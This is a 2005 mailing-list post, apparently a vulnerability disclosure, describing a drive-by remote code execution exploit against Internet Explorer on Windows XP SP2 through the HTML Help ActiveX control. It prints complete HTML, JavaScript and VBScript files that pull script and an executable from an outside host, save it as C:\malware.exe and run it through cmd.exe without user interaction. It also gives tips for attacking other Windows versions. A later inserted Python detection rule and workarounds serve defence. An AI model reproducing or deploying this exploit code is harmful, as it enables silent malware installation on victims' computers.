Message-ID: <20050106192711.64118.qmail@web61304.mail.yahoo.com>
From: shreddersub7 at yahoo.com (ShredderSub7)
Subject: Remote Code Execution with Parameters on Windows (XP SP2)

Remote Code Execution with Parameters on Windows (XP SP2): Updated (it can now install any malware file from the Internet and run it without user interaction needed)
PoC/Exploit:
http://freehost19.websamba.com/shreddersub7/cmdexe.htm
About the PoC/Exploit:
http://freehost19.websamba.com/shreddersub7/cmdexe-d.htm
------------------------
How does this exploit work?
The problem with Internet Explorer is that it sets no restrictions on web pages that request opening a Windows Help file compiled with HTML Help. Without such a restriction, a web page in Internet Explorer can easily command it to open any local web page stored on the victim's computer, including web pages found inside Windows Help files (with extension .CHM). In this PoC (Proof of Concept, see below for viewing the PoC), the web page "compile_date.htm", found in the Windows Help file "ntshared.chm", is opened in HTML Help.

Once a web page stored in a Windows Help file (.CHM) is open, it is possible (thanks to the exploit) to execute an ActiveX control that only fully works in HTML Help files. This ActiveX control can do anything: it can write files to your hard disk and afterwards execute those files. So in this PoC we chose to launch an ActiveX control for HTML Help that first writes the HTML application (.HTA file) "cmdexe.hta" to your C-drive.

Then we execute that file with the same type of ActiveX control. So in this PoC it executes the file "C:\cmdexe.hta" after it was written. This HTML application "C:\cmdexe.hta" was programmed to install the real malware onto your C-drive, in this PoC "C:\malware.exe".

Once that is done, we use the exploit one more time: we execute the malware. It is even possible to pass parameters to the executed program. In this PoC, we started the malware file "C:\malware.exe" after it was written.

To finish, we delete the HTML application "C:\cmdexe.hta" because it is no longer needed. Also, the two programs involved (Internet Explorer and HTML Help) are automatically shut down after the execution is finished, without user interaction.
------------------------
How can you reproduce this PoC?

Create the file "cmdexe.htm" with the following code
(please notice that you may have to change some file
paths!):

<html><head><title>CMDExe - PoC</title></head><body>
<br><OBJECT style="display:none" id="locate" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm::/compile_date.htm">
</OBJECT>
<OBJECT style="display:none" id="locator" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<body style=\\\"display:none\\\" scroll=\\\"no\\\"\"+String.fromCharCode(62)+\"<script language=\\\"javascript\\\" src=\\\"http://freehost19.websamba.com/shreddersub7/cmdexe.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>
<script>locate.HHClick();setTimeout("locator.HHClick()",75);setTimeout("window.opener=null;window.close()",7000)</script></body></html>
-----
Then create the file "cmdexe.txt" (please notice that
you may have to change some file paths!): 

function writehta(){
document.write("<script language=\"vbscript\" src=\"http://freehost19.websamba.com/shreddersub7/cmdexe2.txt\"></script>");
}
function writeexe(){
document.write("<object id=a classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=shortcut><param name=item1 value=',cmd.exe,/d /c start /min C:/cmdexe.hta'></object><script>a.Click\(\)</script>");
}
function startexe(){
document.write("<object id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=shortcut><param name=item1 value=',cmd.exe,/d /c del \"C:/cmdexe.hta\"&&start C:/malware.exe'></object><object id=c classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=close></object><script>b.Click\(\);c.Click\(\)</script>");
}
setTimeout("writehta()",1);
setTimeout("writeexe()",2000);
setTimeout("startexe()",5000);
-----
If that's done, create the file "cmdexe2.txt" (please
notice that you may have to change some file paths!): 

on error resume next
set conn = CreateObject("ADODB.Recordset")
   With conn
       .Fields.Append "conn", 200, "3000"
       Call .Open
       Call .AddNew
       .Fields("conn").Value = "<body style=""display:none"" scroll=""no"">"
       Call .AddNew
       .Fields("conn").Value = "<script language=""vbscript"">: on error resume next : set o = CreateObject(""msxml2.XMLHTTP"") : o.open ""GET"",""http://freehost19.websamba.com/shreddersub7/cmdexe.exe"",False : o.send : set s = createobject(""adodb.stream"") : s.type=1 : s.open : s.write o.responseBody : s.savetofile ""C:\malware.exe"",2 : window.close()</script>"
       Call .Update
   End With
conn.Save "C:\cmdexe.hta", adPersistXML
conn.Close
-----

If you want to use the same test malware file "cmdexe.exe" (again: only for testing; do not cause any damage to someone's PC with it, or you're responsible!), you can find it here:
http://freehost19.websamba.com/shreddersub7/cmdexe.exe
-----

If you want to attack Windows XP RTM (Gold), Windows
XP SP1 or Windows Server 2003 systems, you might have
to upload the "hhctrl.ocx" file too:
http://freehost19.websamba.com/shreddersub7/hhctrl.ocx
------------------------
How to avoid this exploit...
Since there are no patches from Microsoft available yet, here are some (temporary?) solutions:
Disable Internet Explorer, or disable Active Scripting.
Use another browser, for example Mozilla Firefox.
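As an added, defender-side example (not part of the original post or its PoC, and not the author's code): the mechanism described under "How does this exploit work?" and the workarounds listed just above both come down to one observable, an <OBJECT> in ordinary web content that embeds the HTML Help control by its CLSID (adb880a6-d8ff-11cf-9377-00aa003b7a11) and hands it an ms-its: target, a "shortcut" command, a script URI, or an executable path. The Python content-filter rule below flags exactly that pattern, as a proxy or mail gateway could. The regular expressions, the indicator names, the verdict levels and the sample inputs are constructed for this example; the two "hot" samples are trimmed from the PoC on this page.

```python
"""Content-filter rule for the HTML Help (hhctrl.ocx) ActiveX pattern.

Added example, not part of the original post: it flags HTML that embeds the
HTML Help control by CLSID and reports which indicators from the post are
present in its <param> values.  Regexes, indicator names and samples are
constructed for this example.
"""
import re
from typing import Dict, List

# CLSID of the HTML Help control (hhctrl.ocx), as used in the PoC.
HHCTRL_CLSID = "adb880a6-d8ff-11cf-9377-00aa003b7a11"

# <object ...>...</object>, case-insensitive, may span lines.
_OBJECT_RE = re.compile(r"<object\b(?P<attrs>[^>]*)>(?P<body>.*?)</object\s*>", re.I | re.S)
# <param ...>; a '>' may appear inside quoted attribute values, so honour quotes.
_PARAM_RE = re.compile(r"""<param\b(?P<attrs>(?:[^>"']|"[^"]*"|'[^']*')*)>""", re.I | re.S)
# key=value pairs with double-, single- or un-quoted values.
_ATTR_RE = re.compile(r"""(?P<k>[A-Za-z_:-]+)\s*=\s*(?:"(?P<dq>[^"]*)"|'(?P<sq>[^']*)'|(?P<uq>[^\s>]+))""", re.S)


def _attrs(run: str) -> Dict[str, str]:
    """Parse an attribute run into a lower-cased name -> value dict."""
    out: Dict[str, str] = {}
    for m in _ATTR_RE.finditer(run):
        value = next(v for v in (m.group("dq"), m.group("sq"), m.group("uq")) if v is not None)
        out[m.group("k").lower()] = value
    return out


def _indicators(params: Dict[str, str]) -> List[str]:
    """Map the abuse primitives the post describes onto indicator names."""
    found = set()
    for name, value in params.items():
        v = value.lower()
        if "ms-its:" in v or ".chm::" in v:                 # opens a page inside a local .chm
            found.add("chm-target")
        if name == "command" and v.startswith("shortcut"):  # Command=shortcut runs a program
            found.add("shortcut-command")
        if "javascript:" in v or "vbscript:" in v:          # script URI handed to the control
            found.add("script-uri")
        if re.search(r"\.(exe|hta|bat|cmd)\b", v):          # executable or HTA path in a parameter
            found.add("executable-reference")
    return sorted(found)


def scan_html(html: str) -> List[Dict]:
    """Return one finding per <object> that embeds hhctrl.ocx."""
    findings = []
    for obj in _OBJECT_RE.finditer(html):
        attrs = _attrs(obj.group("attrs"))
        if HHCTRL_CLSID not in attrs.get("classid", "").lower():
            continue
        params: Dict[str, str] = {}
        for p in _PARAM_RE.finditer(obj.group("body")):
            pa = _attrs(p.group("attrs"))
            if "name" in pa:
                params[pa["name"].lower()] = pa.get("value", "")
        findings.append({"id": attrs.get("id", ""), "indicators": _indicators(params), "params": params})
    return findings


def verdict(html: str) -> str:
    """'block' on hhctrl plus indicators, 'review' on a bare embed, else 'clean'."""
    findings = scan_html(html)
    if not findings:
        return "clean"
    return "block" if any(f["indicators"] for f in findings) else "review"


# Constructed samples; the first two are trimmed from the PoC in the post.
SAMPLE_CHM = (
    '<OBJECT style="display:none" id="locate" '
    'classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">'
    '<PARAM name="Command" value="Related Topics, MENU">'
    '<PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm::/compile_date.htm">'
    "</OBJECT>"
)
SAMPLE_SHORTCUT = (
    "<object id=a classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>"
    "<param name=command value=shortcut>"
    "<param name=item1 value=',cmd.exe,/d /c start /min C:/cmdexe.hta'>"
    "</object>"
)
SAMPLE_BARE = (
    '<object classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">'
    '<param name="Command" value="Related Topics"></object>'
)
# Placeholder CLSID, not a real control.
SAMPLE_BENIGN = '<p>hello</p><object classid="clsid:00000000-0000-0000-0000-000000000000"></object>'

if __name__ == "__main__":
    for label, sample in (("chm", SAMPLE_CHM), ("shortcut", SAMPLE_SHORTCUT),
                          ("bare", SAMPLE_BARE), ("benign", SAMPLE_BENIGN)):
        print(f"{label:9s} {verdict(sample):7s} {scan_html(sample)}")
```

A gateway that gets "block" from verdict() can drop the page outright; "review" marks a page that embeds hhctrl.ocx at all without a suspicious parameter, which is still worth a look given that the post's request to Microsoft is to disallow the control in web pages entirely. The rule works on the raw markup, so it also catches the variant where the control and its parameters are emitted by document.write(), as long as the filter runs over the script source as well.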
------------------------
To Microsoft: Disable the possibility to integrate HTML Help Controls in HTML web pages. Also, disable the possibility to open arbitrary HTML Help files from an HTML web page. And come on, use some more restricted security zones for HTML applications!
------------------------
You can find the PoC, as explained above, here:
http://freehost19.websamba.com/shreddersub7/cmdexe.htm
The PoC on this page installs and opens a test malware file on your C-drive (called "C:\malware.exe"), nothing more than that. It will not bring any harm to your PC.
Contact: ShredderSub7_at_yahoo.com (of course, replace the "_at_" part with an "@" if you want me to receive your email!)
------------------------
ShredderSub7


		